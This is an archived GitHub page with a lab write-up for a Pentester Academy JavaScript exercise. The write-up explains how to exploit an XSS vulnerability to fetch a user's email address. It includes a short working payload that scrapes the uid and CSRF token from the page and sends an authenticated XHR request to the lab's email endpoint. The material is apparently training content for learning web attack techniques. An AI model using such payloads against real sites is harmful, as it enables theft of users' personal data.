Skip to content
This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

Latest commit

 

History

History
31 lines (22 loc) · 2.31 KB

TASK_17.md

File metadata and controls

31 lines (22 loc) · 2.31 KB
Raw

Task 17 [Try Now]

Objectives:

  1. Find John's Email Address using an XSS vulnerability on this page
  2. Display the Email address in the div with id "result"
  3. No Hardcoded values can be used - everything has to be figured out dynamically

Well this time we have given the crsf token and uid. All we have to do is use it and send an XHR request to the following URL

So let's use the knowledge from last TASK_16 and complete this one

const uid = document.querySelector("p#uid").textContent.trim().slice(4);
const tok = document.querySelector("p#csrf").textContent.trim().slice(6);
const xhttp = new XMLHttpRequest();

xhttp.onreadystatechange = function () {
  if (this.readyState == 4 && this.status == 200) {
    document.querySelector("#result").innerText = xhttp.responseText;
  }
};
xhttp.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/17/email?csrf_token=" + tok + "&uid=" + uid, true);
xhttp.send();

The .trim() is used to remove the leading and training whitespaces and .slice(start) is used to ignore first n characters of the string

For POC, Click Here